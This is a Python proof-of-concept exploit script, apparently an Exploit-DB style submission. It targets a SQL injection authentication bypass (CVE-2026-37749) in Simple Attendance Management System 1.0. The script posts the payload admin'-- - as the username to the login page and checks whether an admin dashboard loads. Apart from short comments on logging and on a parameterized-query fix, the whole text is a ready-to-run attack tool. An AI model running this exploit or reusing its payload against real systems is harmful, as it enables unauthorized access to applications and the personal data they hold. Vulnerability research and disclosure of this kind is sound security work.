#!/usr/bin/env python3
# Exploit Title: Simple Attendance Management System 1.0 - SQLi Authentication Bypass
# Date: 2026-04-16
# Exploit Author: Varad AP Mene ([email protected])
# Vendor Homepage: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Software Link: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37749

import requests
import argparse
import sys

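def exploit(base_url):
    """Send the login request for the bypass and report whether it appears to work.

    Args:
        base_url: Application root without a trailing slash (main() strips
            one); ``/index.php`` is appended to form the login endpoint.

    Returns:
        True when the response looks like an authenticated page, False
        otherwise. The check is heuristic (see comment below), so a True is
        "probably bypassed", not proof.

    Raises:
        requests.RequestException: on connection failure or when the 10-second
            timeout expires; main() catches and prints it.

    Server-side this request is a single POST to index.php whose ``username``
    form field contains a quote followed by a SQL comment sequence, which is
    what application or access logging would need to flag; the underlying fix
    is a parameterized query in the login handler.
    """
    url = f"{base_url}/index.php"
    payload = "admin'-- -"

    # The password value is a placeholder; only the username field is used
    # for the injection.
    data = {
        'username': payload,
        'password': 'anything',
        'type': 'admin',
        'submit': 'submit'
    }

    print(f"[*] Target  : {url}")
    print(f"[*] Payload : {payload}")
    print("[*] Sending request...")

    # Use the session as a context manager so its pooled connections are
    # closed on exit instead of being left to the garbage collector.
    with requests.Session() as session:
        session.headers.update({'User-Agent': 'Mozilla/5.0'})
        r = session.post(url, data=data, timeout=10, allow_redirects=True)

    # Heuristic success check: a final URL containing "dashboard", or a body
    # mentioning "logout", is taken as an authenticated view. Either test can
    # match an unrelated page, so the result is indicative only.
    if 'dashboard' in r.url or 'logout' in r.text.lower():
        print("[+] SUCCESS! Authentication bypassed!")
        print(f"[+] Redirected to: {r.url}")
        return True

    print(f"[-] Failed. Status: {r.status_code}")
    return False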

def main():
    """Parse ``--url``, print the banner, run exploit() and exit with its status.

    Exit status is 0 when exploit() returns True and 1 when it returns False
    or raises; any exception is printed as an error line rather than
    propagated.
    """
    arg_parser = argparse.ArgumentParser(
        description='CVE-2026-37749 - SQLi Auth Bypass PoC'
    )
    arg_parser.add_argument(
        '--url',
        required=True,
        help='Target URL e.g. http://192.168.1.1/attendance',
    )
    options = arg_parser.parse_args()

    rule = "=" * 60
    banner = (
        rule,
        "CVE-2026-37749 — SQLi Authentication Bypass",
        "Product: Simple Attendance Management System 1.0",
        "Author : Varad AP Mene",
        rule,
        "",
    )
    for line in banner:
        print(line)

    # A trailing slash is stripped so exploit() can append its own path.
    target = options.url.rstrip('/')
    try:
        succeeded = exploit(target)
    except Exception as exc:
        print(f"[-] Error: {exc}")
        sys.exit(1)
    sys.exit(0 if succeeded else 1)

if __name__ == "__main__":
    # Run the CLI only when executed as a script, not on import.
    main()